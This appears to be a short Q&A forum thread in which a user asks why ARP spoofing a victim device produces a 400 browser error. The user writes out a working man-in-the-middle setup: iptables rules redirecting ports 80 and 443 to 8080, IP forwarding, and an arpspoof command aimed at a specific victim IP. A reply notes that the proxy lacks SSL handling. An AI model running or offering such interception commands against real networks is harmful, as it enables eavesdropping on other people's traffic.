D
D
DVoropaev2017-07-06 03:06:36
Computer networks
DVoropaev, 2017-07-06 03:06:36

Why does arp spoofing on a victim device result in a 400 error in the browser?

iptables -t nat -A PREROUTING -p tcp —destination-port 80 -j REDIRECT —to-port 8080
iptables -t nat -A PREROUTING -p tcp —destination-port 443 -j REDIRECT —to-port 8080
echo "1" > /proc/sys/net/ipv4/ip_forward
sudo arpspoof -i wlp2s0f0 -t 192.168.43.230 192.168.43.1

Answer the question

In order to leave comments, you need to log in

1 answer(s)
T
TyzhSysAdmin, 2017-07-06
@POS_troi

because your 8080 doesn't know SSL

Didn't find what you were looking for?

Ask your question

Ask a Question

731 491 924 answers to any question